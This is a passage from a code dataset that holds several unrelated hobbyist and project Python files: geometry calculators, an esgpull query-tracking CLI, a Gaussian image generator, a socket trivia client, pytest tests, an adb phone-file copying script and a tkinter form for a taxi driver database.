\"))\n vol_pyr = (side_a * side_b * height) / 3\n print(f\"The triangle's volume is: {vol_pyr} cubic cm\")\n\ndef vol_cone():\n radius = int(input(\"Type de cone's radius in cm: \"))\n height = int(input(\"Type de cone's heigh in cm: \"))\n vol_con = (PI * (radius**2) * height) / 3\n print(f\"The cone's volume is: {vol_con} cubic cm\")\n\n\ndef vol_cube():\n side_a = int(input(\"Type de cube's side_a in cm: \"))\n side_b = int(input(\"Type de cube's side_b in cm: \"))\n height = int(input(\"Type de cube's heigh in cm: \"))\n vol_cub = side_a * side_b * height\n print(f\"The cube's volume is: {vol_cub} cubic cm\")\n\n\ndef vol_sphere():\n radius = int(input(\"Type de sphere's radius in cm: \"))\n vol_sph = (4 * PI * (radius**3)) / 3\n print(f\"The sphere's volume is: {vol_sph} cubic cm\")\n\n\nif __name__ == '__main__':\n 
main()","repo_name":"isabelyb/datacademy_platzi","sub_path":"04_challenge_4_bonus.py","file_name":"04_challenge_4_bonus.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12775505566","text":"from __future__ import annotations\n\nimport click\nfrom click.exceptions import Abort, Exit\nfrom rich.box import MINIMAL_DOUBLE_HEAD\nfrom rich.table import Table\nfrom rich.text import Text\n\nfrom esgpull.cli.decorators import args, opts\nfrom esgpull.cli.utils import init_esgpull, valid_name_tag\nfrom esgpull.tui import Verbosity\n\n\n@click.command()\n@args.query_ids\n@opts.record\n@opts.verbosity\ndef track(\n query_ids: tuple[str],\n record: bool,\n verbosity: Verbosity,\n) -> None:\n \"\"\"\n Track queries\n\n As a side effect, tracking a query applies all default options to the query,\n so that modifications of the config's default options have no impact on\n previouly tracked queries.\n \"\"\"\n esg = init_esgpull(verbosity, record=record)\n with esg.ui.logging(\"track\", onraise=Abort):\n for sha in query_ids:\n if not valid_name_tag(esg.graph, esg.ui, sha, None):\n esg.ui.raise_maybe_record(Exit(1))\n query = esg.graph.get(sha)\n if query.tracked:\n esg.ui.print(f\"{query.rich_name} is already tracked.\")\n esg.ui.raise_maybe_record(Exit(0))\n if esg.graph.get_children(query.sha):\n msg = f\"{query.rich_name} has children, track anyway?\"\n if not esg.ui.ask(msg, default=False):\n esg.ui.raise_maybe_record(Abort)\n expanded = esg.graph.expand(query.sha)\n tracked_query = query.clone(compute_sha=False)\n tracked_query.track(expanded.options)\n if query.sha != tracked_query.sha:\n msg = f\"For {query.rich_name} to become tracked, options must be set.\"\n esg.ui.print(msg)\n table = Table(\n box=MINIMAL_DOUBLE_HEAD,\n show_edge=False,\n show_lines=True,\n )\n table.add_column(Text(\"before\", justify=\"center\"))\n table.add_column(Text(\"after\", justify=\"center\"))\n table.add_row(query, tracked_query)\n esg.ui.print(table)\n if not esg.ui.ask(\"Apply changes?\"):\n esg.ui.raise_maybe_record(Abort)\n esg.graph.replace(query, tracked_query)\n esg.graph.merge()\n esg.ui.print(f\":+1: {tracked_query.rich_name} is now tracked.\")\n esg.ui.raise_maybe_record(Exit(0))\n\n\n@click.command()\n@args.query_ids\n@opts.verbosity\ndef untrack(\n query_ids: tuple[str],\n verbosity: Verbosity,\n) -> None:\n \"\"\"\n Untrack queries\n \"\"\"\n esg = init_esgpull(verbosity)\n with esg.ui.logging(\"untrack\", onraise=Abort):\n for sha in query_ids:\n if not valid_name_tag(esg.graph, esg.ui, sha, None):\n raise Exit(1)\n query = esg.graph.get(sha)\n if not query.tracked:\n esg.ui.print(f\"Query {query.rich_name} is already untracked.\")\n raise Exit(0)\n query.untrack()\n esg.graph.merge()\n esg.ui.print(f\":+1: Query {query.rich_name} is no longer tracked.\")\n","repo_name":"ESGF/esgf-download","sub_path":"esgpull/cli/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"19724588039","text":"from __future__ import division\nfrom __future__ import print_function\nimport numpy as np\nfrom PIL import Image\nfrom random import randint\n\n\nfor n in range(0,400):\n\t#import time\n\t#date_string = time.strftime(\"%Y-%m-%d-%H:%M:%S\")\n#Initialize the matrix- Size (100,100)\n\tsize = 100\n\tarr = np.zeros((size,size))\n\n#Initialize the Gaussian Properties\n\n\tx0 = randint(1,100); 
y0 = randint(1,100); sigmax = randint(1,10); sigmay = randint(1,10)\n\n\tcenter = (x0,y0)\n\tprint (center)\n#Create the Gaussian Function\n\n\tdef Gaussian(x,y):\n\t\tresult = int(round( 255*np.exp(-(x - x0)**2 / (2 * sigmax**2)) * np.exp( -(y - y0)**2 / (2 *sigmay**2))))\n\t\treturn result\n\n\tfor i in range(size):\n\t\tfor j in range(size):\n\t\t\tarr[i][j] = Gaussian(i,j)\n\n\tim = Image.fromarray(arr)\n\tif im.mode !='RGB':\n\t\tim = im.convert('RGB')\n\t\t#im.show()\n\t\tim.save(\"/home/garrett/train/\"+str(n)+\".jpeg\", \"JPEG\")\n","repo_name":"gjepson/HAL-9000","sub_path":"imagegenerator.py","file_name":"imagegenerator.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"46493221889","text":"import socket\nimport chatlib # To use chatlib functions or consts, use chatlib.****\nimport time\n\nSERVER_IP = \"http://ec2-18-222-216-47.us-east-2.compute.amazonaws.com\" # Our server will run on same computer as client\nSERVER_PORT = 5678\n\n\n# mark: HELPER SOCKET METHODS\n\ndef build_and_send_message(conn, code, data):\n \"\"\"\n Builds a new message using chatlib, wanted code and message.\n Prints debug info, then sends it to the given socket.\n Paramaters: conn (socket object), code (str), data (str)\n Returns: Nothing\n \"\"\"\n masg_send = chatlib.build_message(code, data)\n # print(masg_send)\n conn.send(masg_send.encode())\n\n\ndef recv_message_and_parse(conn):\n \"\"\"\n Recieves a new message from given socket,\n then parses the message using chatlib.\n Paramaters: conn (socket object)\n Returns: cmd (str) and data (str) of the received message.\n If error occured, will return None, None\n \"\"\"\n\n full_msg = conn.recv(1024).decode()\n cmd, data = chatlib.parse_message(full_msg)\n return cmd, data\n\n\ndef connect():\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # my_socket.connect((IP, PORT))\n my_socket.connect((SERVER_IP, SERVER_PORT))\n print(\"connecting to \" + str(SERVER_IP) + \" port \" + str(SERVER_PORT))\n return my_socket\n\n\ndef error_and_exit(error_msg):\n print(error_msg)\n exit()\n\ndef build_send_recv_parse(conn, code, data):\n build_and_send_message(conn, code, data)\n return recv_message_and_parse(conn)\n\n# mark: The protocol\n\ndef login(conn):\n username = input(\"Please enter username: \\n\")\n password = input(\"Please enter password: \\n\")\n # username = \"abc\"\n # password = \"123\"\n user_pass = username + \"#\" + password\n login_success = False\n while login_success == False:\n build_and_send_message(conn, chatlib.PROTOCOL_CLIENT[\"login_msg\"], user_pass)\n server_recv = recv_message_and_parse(conn)\n print(server_recv[1])\n # mseg = chatlib.parse_message(server_recv)\n if chatlib.PROTOCOL_SERVER[\"login_ok_msg\"] in server_recv:\n print(\"Log in successfully!\")\n return True\n else:\n print(\"Connection failed\")\n return False\n\n\ndef logout(conn):\n build_and_send_message(conn, chatlib.PROTOCOL_CLIENT[\"logout_msg\"], \"\")\n conn.close()\n print(\"I closed the link with the server\")\n\n\ndef get_score(conn):\n server_recv = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"score_msg\"], \"\")\n print(\"your score is: \" + server_recv[1])\n\n\ndef get_highscore(conn):\n server_recv = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"highscore_msg\"], \"\")\n print(\"The highest score is: \\n\" + server_recv[1])\n\n\ndef play_question(conn):\n question = build_send_recv_parse(conn, 
chatlib.PROTOCOL_CLIENT[\"get_question\"], \"\")\n if question[0] == \"NO_QUESTIONS \":\n print(\"The server ran out of questions\")\n return\n question_data = question[1].split(\"#\")\n print(question_data[1])\n # print(question_data[2])\n\n user_question = input(\" a): \" + question_data[2] + \"\\n b): \" + question_data[3] + \"\\n c): \" + question_data[4] + \"\\n d): \" + question_data[5] + \"\\n your answer: \")\n if \"a\" in user_question or \"b\" in user_question or \"c\" in user_question or \"d\" in user_question:\n pass\n else:\n print(\"Please choose from the options! (a / b / c / d)\")\n user_question = input(\n \" a): \" + question_data[2] + \"\\n b): \" + question_data[3] + \"\\n c): \" + question_data[4] + \"\\n d): \" +\n question_data[5] + \"\\n your answer: \")\n\n unsers = {\"a\": \"1\",\n \"b\": \"2\",\n \"c\": \"3\",\n \"d\": \"4\"\n }\n correct_answer = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"send_answer\"], str(question_data[0]) + \"#\" + str(unsers[user_question]))\n if correct_answer[0] == \"CORRECT_ANSWER\":\n print(\"Well done correct answer!\")\n elif correct_answer[0] == \"WRONG_ANSWER\":\n print(\"Wrong, the correct answer is: \" + question_data[int(correct_answer[1]) + 1])\n else:\n error_and_exit(\"question_data\")\n\ndef get_logged_users(conn):\n players_connected = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"players_connected\"], \"\")\n players_connected_list = players_connected[1].split(\",\")\n players_connected_str = \"Number of players connected: \" + str(len(players_connected_list))\n for name in players_connected_list:\n players_connected_str += \"\\n\" + name\n return players_connected_str\n\n\n\n\ndef main():\n my_socket = connect()\n if login(my_socket) == False:\n return\n print(\"\\n\")\n while True:\n user_input = input(\"\"\"what would you like to do? 
\\n p Play a trivia question \\n s Get my score \\n h Get high score \\n c Get connected users \\n q Exit \\n Please enter your choice: \"\"\")\n if user_input == \"s\":\n get_score(my_socket)\n elif user_input == \"h\":\n get_highscore(my_socket)\n elif user_input == \"p\":\n play_question(my_socket)\n elif user_input == \"c\":\n print(get_logged_users(my_socket))\n elif user_input == \"q\":\n logout(my_socket)\n return\n else:\n print(user_input + \" is not option\")\n # play_question(my_socket)\nif __name__ == '__main__':\n main()\n","repo_name":"Aviv05423/NetworkTrivia","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73478623550","text":"import pytest\n\nfrom tests.utils import pretty_results, bug_1224, bug_1225, reciprocal,\\\n sqrt, square, error_msg\n\n\ntest_data_single_operand = (\n # template: [operation, operand, expected_result]\n\n pytest.param(reciprocal, 0, error_msg, marks=bug_1225),\n [reciprocal, -2, -0.5],\n [sqrt, 1, 1],\n [sqrt, 4, 2],\n [sqrt, 0, 0],\n pytest.param(sqrt, -1, error_msg, marks=bug_1224),\n [square, 0, 0],\n [square, 1, 1],\n [square, 2, 4],\n [square, -1, 1]\n)\n\n\n@pytest.mark.parametrize(\"operation, x, y\", test_data_single_operand,\n ids=pretty_results(test_data_single_operand))\ndef test_operations(operation, x, y):\n assert operation(x) == y\n","repo_name":"ifar/tech3camp-pytest","sub_path":"tests/operations/test_9_interesting.py","file_name":"test_9_interesting.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"14515427086","text":"import os\nimport time\nimport colorama\nfrom colorama import Fore, Style, Back\n\ndef PC_path():\n\ttry:\n\t\tprint (Fore.GREEN)\n\t\tprint (\"You can input PC path manual\")\n\t\tprint(Style.RESET_ALL)\n\t\tPC_path = input (\"PC path of phone: \")\n\t\tprint(\"OK\")\n\t\tif PC_path ==\"\":\n\t\t\tPC_path\t= \".\"\n\t\tprint(PC_path)\n\texcept OSError:\n\t\tprint (\"Don`t read path \")\n\telse:\n\t\tprint (\"Function back PC path \", BP_path[0])\n\t\treturn PC_path , OSError\n\ndef base_phone_path(path):\n\ttry:\n\t\tBPpath_file = path +\"/base_path_phone.txt\"\n\t\tf=open(BPpath_file, \"r\")\n\t\tBP_path = f.read().strip()\n\texcept OSError:\n\t\tprint (\"Don`t read path \")\n\telse:\n\t\tprint (\"Function back base phone path \", BP_path)\n\t\treturn BP_path , OSError\n\ndef final_phone_path():\n\ttry:\n\t\tprint (Fore.RED)\n\t\tprint (\"1 - bluetooth\")\n\t\tprint (\"2 - DCIM\")\n\t\tprint (\"3 - documents\")\n\t\tprint (\"4 - Download\")\n\t\tprint (\"5 - Fonts\")\n\t\tprint (\"6 - inshot\")\n\t\tprint (\"7 - MIUI/sound_recorder\")\n\t\tprint (\"8 - Movies\")\n\t\tprint (\"9 - Music\")\n\t\tprint (\"10 - Pictures\")\n\t\tprint (\"11 - Ringtones\")\n\t\tprint (\"12 - Telegram\")\n\t\tprint (\"13 - viber\")\n\t\tprint (\"14 - Whatsapp/media\")\n\t\tprint (\"15 - youcut\")\n\t\tprint (\"100 - /data/data/com.termux/files/home\")\n\t\tprint (\"all - Copy all items\")\n\t\tprint(Style.RESET_ALL)\n\t\tchoise = input (\"Choise of the Directory for copy : \")\n\n\t\tif choise == \"1\":\n\t\t\tFP_path = \"bluetooth\"\n\t\telif choise == \"2\":\n\t\t\tFP_path = \"DCIM\"\n\t\telif choise == \"3\":\n\t\t\tFP_path = \"documents\"\n\t\telif choise == \"4\":\n\t\t\tFP_path = \"Download\"\n\t\telif choise == \"5\":\n\t\t\tFP_path = \"Fonts\"\n\t\telif choise == 
\"6\":\n\t\t\tFP_path = \"inshot\"\n\t\telif choise == \"7\":\n\t\t\tFP_path = \"MIUI/sound_recorder\"\n\t\telif choise == \"8\":\n\t\t\tFP_path = \"Movies\"\n\t\telif choise == \"9\":\n\t\t\tFP_path = \"Music\"\n\t\telif choise == \"10\":\n\t\t\tFP_path = \"Pictures\"\n\t\telif choise == \"11\":\n\t\t\tFP_path = \"Ringtones\"\n\t\telif choise == \"12\":\n\t\t\tFP_path = \"Telegram\"\n\t\telif choise == \"13\":\n\t\t\tFP_path = \"viber\"\n\t\telif choise == \"14\":\n\t\t\tFP_path = \"Whatsapp/Media\"\n\t\telif choise == \"15\":\n\t\t\tFP_path = \"youcut\"\n\t\telif choise == \"100\":\n\t\t\tFP_path = \"/data/data/com.termux/files/home\"\n\t\telif choise == \"all\":\n\t\t\tFP_path = \"/data/data/com.termux/files/home\"\n\texcept OSError:\n\t\tprint (\"Don`t read path \")\n\telse:\n\t\tprint (Fore.BLUE)\n\t\tprint (\"Function back final phone path: \", FP_path)\n\t\tprint(Style.RESET_ALL)\n\t\treturn FP_path , choise, OSError\n\n#adb pull /storage/emulated/0/DCIM/Screenshots/ /media/korolevsa/Files/55/1\\ NTFS/sort/перенос\\ файлов/DCIM/\n\ntry:\n\tpath = os.getcwd()\n\tBP_path = \"/storage/emulated/0\"\n\tBP_path = base_phone_path(path)\n\tprint (Fore.BLUE)\n\tprint (\"default base path of phone = \" + BP_path[0])\n\tprint (\"You can input base path manual\")\n\tprint(Style.RESET_ALL)\n\trez_inp = input (\"Base path of phone: \")\n\tprint(BP_path[0])\n\tprint(\"OK\")\n\tif rez_inp !=\"\":\n\t\tBP_path\t= rez_inp\n\tFP_path = final_phone_path()\n\tPC_path = PC_path()\n\tprint(FP_path[1])\n\n\tif FP_path[1] == \"bluetooth\" or FP_path[1] == \"DCIM\" or FP_path[1] == \"documents\" or FP_path[1] == \"Download\" or FP_path[1] == \"Fonts\" or FP_path[1] == \"inshot\" or FP_path[1] == \"MIUI/sound_recorder\" or FP_path[1] == \"Movies\" or FP_path[1] == \"Music\" or FP_path[1] == \"Pictures\" or FP_path[1] == \"Ringtones\" or FP_path[1] == \"Telegram\" or FP_path[1] == \"viber\" or FP_path[1] == \"Whatsapp/Media\" or FP_path[1] == \"youcut\" or FP_path[1] == \"/data/data/com.termux/files/home\":\n\t\tprint (Fore.MAGENTA)\n\t\tprint(\"su adb pull \"+ FP_path[0] +\" \"+ PC_path[0])\n\t\tos.system(\"su adb pull \" + FP_path[0] +\" \"+ PC_path[0])\n\t\tprint(Style.RESET_ALL)\n\telse:\n\t\tprint (Back.MAGENTA + Fore.YELLOW + Style.BRIGHT)\n\t\tprint(\"adb pull \"+ BP_path[0] + \"/\" + FP_path[0] +\" \"+ PC_path[0])\n\t\tos.system(\"adb pull \"+ BP_path[0] + \"/\" + FP_path[0] +\" \"+ PC_path[0])\n\t\tprint(Style.RESET_ALL)\n\nexcept OSError:\n\tprint (\"Runtime error\")\nelse:\n\tprint (\"Success\")\n\n\n\nprint (\"All line are processed\")\n","repo_name":"serhio1212/mob_script","sub_path":"files_management/down_files_with_phone.py","file_name":"down_files_with_phone.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3319797884","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkcalendar import DateEntry\r\n\r\nglobal driver_no_entry, pda_password_entry, driver_no_entry, pda_password_entry, pda_vr, mobile_vr, driver_blocked_vr\r\nglobal driver_first_name_entry, driver_last_name_entry, driver_gender_vr, driver_birthday_vr, driver_address_1_entry\r\nglobal driver_address_2_entry\r\nglobal driver_home_phone_entry, driver_mobile_entry, driver_date_joined_vr, driver_date_left_vr\r\nglobal driver_national_insurance_entry, driver_license_entry, driver_penalties_vr, driver_pco_entry\r\nglobal driver_pco_exp_vr, driver_town_entry, driver_postcode_entry\r\nglobal insurance_premium_entry, 
insurance_ex_vr, road_expiry_vr, pco_number_entry, pco_expiry_vr\r\nglobal veh_reg_entry, veh_make_entry, veh_model_entry, veh_color_entry, veh_category_vr, veh_ownership_vr\r\nglobal type_vehicle_vr, deposit_entry, base_vr, radio_vr, outstanding_b_entry, commission_rate_vr\r\nglobal commission_rate_acc_vr, rent_entry, salary_entry\r\n\r\n\r\ndef saver():\r\n from new_driver_database import save\r\n save()\r\n\r\n\r\ndef addnew_driver(notebook, screen_width, screen_height):\r\n driver_top = Frame(notebook, width=screen_width, height=screen_height)\r\n notebook.add(driver_top, text=\"New Driver\")\r\n driver_top.update()\r\n\r\n # _________add_new_driver frame________\r\n add_new_driver_frame = Frame(driver_top, bg=\"red\")\r\n add_new_driver_frame.place(x=0, y=0, height=(screen_height), width=(screen_width))\r\n add_new_driver_frame.update()\r\n frame_width = add_new_driver_frame.winfo_width()\r\n frame_height = add_new_driver_frame.winfo_height()\r\n\r\n # __________ Driver login information___________\r\n driver_login_info = LabelFrame(add_new_driver_frame, text=\"Login Information\", bg=\"green\", font=(\"Arial\", 12))\r\n driver_login_info.place(x=frame_width * 0.05, y=frame_height * 0.01, height=frame_height * 0.2,\r\n width=frame_width * 0.4)\r\n # ______Labels______\r\n driver_no = Label(driver_login_info, text=\"Driver NO\", font=(\"Arial\", 12))\r\n pda_password = Label(driver_login_info, text=\"PDA Password\", font=(\"Arial\", 12))\r\n device = Label(driver_login_info, text=\"Device\", font=(\"Arial\", 12))\r\n driver_blocked = Label(driver_login_info, text=\"Driver Blocked\", font=(\"Arial\", 12))\r\n driver_no.grid(row=0, column=0, pady=5, padx=5)\r\n pda_password.grid(row=0, column=3, pady=5, padx=5)\r\n device.grid(row=1, column=0, pady=5, padx=5)\r\n driver_blocked.grid(row=1, column=3, pady=5, padx=5)\r\n # _______Actions_________\r\n global driver_no_entry, pda_password_entry, driver_no_entry, pda_password_entry, pda_vr, mobile_vr, driver_blocked_vr\r\n driver_no_entry = Entry(driver_login_info)\r\n pda_password_entry = Entry(driver_login_info)\r\n driver_no_entry.grid(row=0, column=1, pady=5, padx=5, columnspan=2)\r\n pda_password_entry.grid(row=0, column=4, pady=5, padx=5)\r\n pda_vr = IntVar()\r\n pda_check_box = Checkbutton(driver_login_info, variable=pda_vr, font=(\"Arial\", 12), onvalue=0, offvalue=1,\r\n text=\"PDA\")\r\n pda_check_box.deselect()\r\n pda_check_box.grid(row=1, column=1, pady=5, padx=5)\r\n mobile_vr = IntVar()\r\n mobile_box = Checkbutton(driver_login_info, font=(\"Arial\", 12), variable=mobile_vr, onvalue=0, offvalue=1,\r\n text=\"Mobile\")\r\n mobile_box.deselect()\r\n mobile_box.grid(row=1, column=2, pady=5, padx=5)\r\n driver_blocked_vr = IntVar()\r\n driver_blocked_box = Checkbutton(driver_login_info, font=(\"Arial\", 12), variable=driver_blocked_vr, onvalue=0,\r\n offvalue=1,\r\n text=\"Blocked\")\r\n driver_blocked_box.deselect()\r\n driver_blocked_box.grid(row=1, column=4, pady=5, padx=5)\r\n\r\n # __________ Driver personal information___________\r\n driver_personal_info = LabelFrame(add_new_driver_frame, text=\"Personal Information\", bg=\"blue\")\r\n driver_personal_info.place(x=frame_width * 0.05, y=frame_height * 0.15, height=frame_height * 0.39,\r\n width=frame_width * 0.4)\r\n\r\n # _ Labels and actions\r\n driver_first_name_label = Label(driver_personal_info, text=\"First Name\", font=(\"Arial\", 12))\r\n driver_last_name_label = Label(driver_personal_info, text=\"Last Name\", font=(\"Arial\", 12))\r\n driver_gender_label = 
Label(driver_personal_info, text=\"Gender\", font=(\"Arial\", 12))\r\n driver_birthday_label = Label(driver_personal_info, text=\"DOB\", font=(\"Arial\", 12))\r\n driver_address_1 = Label(driver_personal_info, text=\"Address ln1\", font=(\"Arial\", 12))\r\n driver_address_2 = Label(driver_personal_info, text=\"Address ln2\", font=(\"Arial\", 12))\r\n driver_town = Label(driver_personal_info, text=\"Town\", font=(\"Arial\", 12))\r\n driver_postcode = Label(driver_personal_info, text=\"Postcode\", font=(\"Arial\", 12))\r\n driver_home_phone = Label(driver_personal_info, text=\"Ho Phone\", font=(\"Arial\", 12))\r\n driver_mobile = Label(driver_personal_info, text=\"Mobile\", font=(\"Arial\", 12))\r\n driver_date_joined = Label(driver_personal_info, text=\"Date Joined\", font=(\"Arial\", 12))\r\n driver_date_left = Label(driver_personal_info, text=\"Date Left\", font=(\"Arial\", 12))\r\n driver_national_insurance = Label(driver_personal_info, text=\"N.I.C\", font=(\"Arial\", 12))\r\n driver_license = Label(driver_personal_info, text=\"Dri License\", font=(\"Arial\", 12))\r\n driver_penalties = Label(driver_personal_info, text=\"Penalties.Pts\", font=(\"Arial\", 12))\r\n driver_pco = Label(driver_personal_info, text=\"PCO No\", font=(\"Arial\", 12))\r\n driver_pco_exp = Label(driver_personal_info, text=\"PCO Exp\", font=(\"Arial\", 12))\r\n # _____________Actions________________\r\n driver_first_name_label.grid(row=0, column=0, pady=(5, 2), padx=5)\r\n global driver_first_name_entry, driver_last_name_entry, driver_gender_vr, driver_birthday_vr, driver_address_1_entry\r\n global driver_address_2_entry, insurance_ex_vr\r\n global driver_home_phone_entry, driver_mobile_entry, driver_date_joined_vr, driver_date_left_vr\r\n global driver_national_insurance_entry, driver_license_entry, driver_penalties_vr, driver_pco_entry\r\n global driver_pco_exp_vr, driver_town_entry, driver_postcode_entry\r\n global insurance_premium_entry, insurance_ex_v, road_expiry_vr, pco_number_entry, pco_expiry_vr\r\n global veh_reg_entry, veh_make_entry, veh_model_entry, veh_color_entry, veh_category_vr, veh_ownership_vr\r\n driver_first_name_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_first_name_entry.grid(row=0, column=1, pady=(5, 2), padx=5)\r\n # ______________\r\n driver_last_name_label.grid(row=0, column=2, pady=(5, 2), padx=5)\r\n driver_last_name_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_last_name_entry.grid(row=0, column=3, pady=(5, 2), padx=5)\r\n # --------------------------------\r\n driver_gender_label.grid(row=1, column=0, pady=2, padx=5)\r\n driver_gender_vr = StringVar()\r\n driver_gender_box = ttk.Combobox(driver_personal_info, width=13, textvariable=driver_gender_vr, font=(\"Arial\", 12))\r\n driver_gender_box['values'] = (\"Male\", \"Female\")\r\n driver_gender_box.grid(row=1, column=1, pady=2, padx=5)\r\n driver_gender_box.current(0)\r\n # --------------------------------\r\n driver_birthday_label.grid(row=1, column=2, pady=2, padx=5)\r\n driver_birthday_vr = StringVar()\r\n driver_birthday_pick = DateEntry(driver_personal_info, width=13, selectmode=\"day\", textvariable=driver_birthday_vr,\r\n font=(\"Arial\", 12))\r\n driver_birthday_pick.grid(row=1, column=3, pady=2, padx=5)\r\n # ___________________________________\r\n driver_address_1.grid(row=2, column=0, pady=2, padx=5)\r\n driver_address_1_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_address_1_entry.grid(row=2, column=1, pady=2, padx=5)\r\n 
# --------------------------------\r\n driver_address_2.grid(row=2, column=2, pady=2, padx=5)\r\n driver_address_2_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_address_2_entry.grid(row=2, column=3, pady=5, padx=5)\r\n # --------------------------------\r\n driver_town.grid(row=3, column=0, pady=2, padx=5)\r\n driver_town_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_town_entry.grid(row=3, column=1, pady=2, padx=5)\r\n # --------------------------------\r\n driver_postcode.grid(row=3, column=2, pady=2, padx=5)\r\n driver_postcode_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_postcode_entry.grid(row=3, column=3, pady=2, padx=5)\r\n # --------------------------------\r\n driver_home_phone.grid(row=4, column=0, pady=2, padx=5)\r\n driver_home_phone_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_home_phone_entry.grid(row=4, column=1, pady=2, padx=5)\r\n driver_mobile.grid(row=4, column=2, pady=2, padx=5)\r\n driver_mobile_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_mobile_entry.grid(row=4, column=3, pady=2, padx=5)\r\n # ____________________________________\r\n driver_date_joined.grid(row=5, column=0, pady=2, padx=5)\r\n driver_date_joined_vr = StringVar()\r\n driver_date_joined_pick = DateEntry(driver_personal_info, width=13, selectmode=\"day\",\r\n textvariable=driver_date_joined_vr, font=(\"Arial\", 12))\r\n driver_date_joined_pick.grid(row=5, column=1, pady=2, padx=5)\r\n driver_date_left.grid(row=5, column=2, pady=2, padx=5)\r\n driver_date_left_vr = StringVar()\r\n driver_date_left_pick = DateEntry(driver_personal_info, width=13, selectmode=\"day\",\r\n textvariable=driver_date_left_vr, font=(\"Arial\", 12))\r\n driver_date_left_pick.grid(row=5, column=3, pady=2, padx=5)\r\n # ______________________________________\r\n driver_national_insurance.grid(row=6, column=0, pady=2, padx=5)\r\n driver_national_insurance_entry = Entry(driver_personal_info, width=15, font=(\"Arial\", 12))\r\n driver_national_insurance_entry.grid(row=6, column=1, pady=2, padx=5)\r\n driver_license.grid(row=6, column=2, pady=2, padx=5)\r\n driver_license_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_license_entry.grid(row=6, column=3, pady=2, padx=5)\r\n # --------------------------\r\n driver_penalties.grid(row=7, column=0, pady=2, padx=5)\r\n driver_penalties_vr = IntVar()\r\n driver_penalties_spin = ttk.Spinbox(driver_personal_info, width=13, from_=0, to=5, textvariable=driver_penalties_vr,\r\n font=(\"Arial\", 12))\r\n driver_penalties_spin.grid(row=7, column=1, pady=2, padx=5)\r\n driver_penalties_spin.set(0)\r\n # ____________________________\r\n driver_pco.grid(row=7, column=2, pady=2, padx=5)\r\n driver_pco_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_pco_entry.grid(row=7, column=3, pady=2, padx=5)\r\n driver_pco_exp.grid(row=8, column=0, pady=2, padx=5)\r\n driver_pco_exp_vr = StringVar()\r\n driver_pco_exp_pick = DateEntry(driver_personal_info, width=13, selectmode=\"day\", textvariable=driver_pco_exp_vr,\r\n font=(\"Arial\", 12))\r\n driver_pco_exp_pick.grid(row=8, column=1, pady=2, padx=5)\r\n\r\n # __________ Vehicle details___________\r\n vehicle_details = LabelFrame(add_new_driver_frame, text=\"Vehicle Details\", bg=\"yellow\")\r\n vehicle_details.place(x=frame_width * 0.47, y=frame_height * 0.013, height=frame_height * 0.4,\r\n width=frame_width * 0.45)\r\n\r\n # 
_________________ label_______________\r\n veh_reg = Label(vehicle_details, text=\"Vehicle Registration\", font=(\"Arial\", 12))\r\n veh_make = Label(vehicle_details, text=\"Vehicle Make\", font=(\"Arial\", 12))\r\n veh_model = Label(vehicle_details, text=\"Vehicle Model\", font=(\"Arial\", 12))\r\n veh_color = Label(vehicle_details, text=\"Vehicle Color\", font=(\"Arial\", 12))\r\n veh_category = Label(vehicle_details, text=\"Category\", font=(\"Arial\", 12))\r\n veh_ownership = Label(vehicle_details, text=\"Ownership\", font=(\"Arial\", 12))\r\n # _______________Actions________\r\n\r\n veh_reg.grid(row=0, column=0, pady=2, padx=5)\r\n veh_reg_entry = Entry(vehicle_details, font=(\"Arial\", 12), width=15)\r\n veh_reg_entry.grid(row=0, column=1, pady=2, padx=5)\r\n veh_make.grid(row=0, column=2, pady=2, padx=5)\r\n veh_make_entry = Entry(vehicle_details, font=(\"Arial\", 12), width=15)\r\n veh_make_entry.grid(row=0, column=3, pady=2, padx=5)\r\n veh_model.grid(row=1, column=0, pady=2, padx=5)\r\n veh_model_entry = Entry(vehicle_details, font=(\"Arial\", 12), width=15)\r\n veh_model_entry.grid(row=1, column=1, pady=2, padx=5)\r\n veh_color.grid(row=1, column=2, pady=2, padx=5)\r\n veh_color_entry = Entry(vehicle_details, font=(\"Arial\", 12), width=15)\r\n veh_color_entry.grid(row=1, column=3, pady=2, padx=5)\r\n veh_category.grid(row=2, column=0, pady=2, padx=5)\r\n veh_category_vr = StringVar()\r\n veh_category_com = ttk.Combobox(vehicle_details, width=13, textvariable=veh_category_vr, font=(\"Arial\", 12))\r\n veh_category_com['values'] = (\"Any Car\", \"MPV5\", \"MPV6\", \"MPV7\", \"MPV8\")\r\n veh_category_com.set(\"Any Car\")\r\n veh_category_com.grid(row=2, column=1, pady=2, padx=5)\r\n veh_ownership.grid(row=2, column=2, pady=2, padx=5)\r\n veh_ownership_vr = StringVar()\r\n 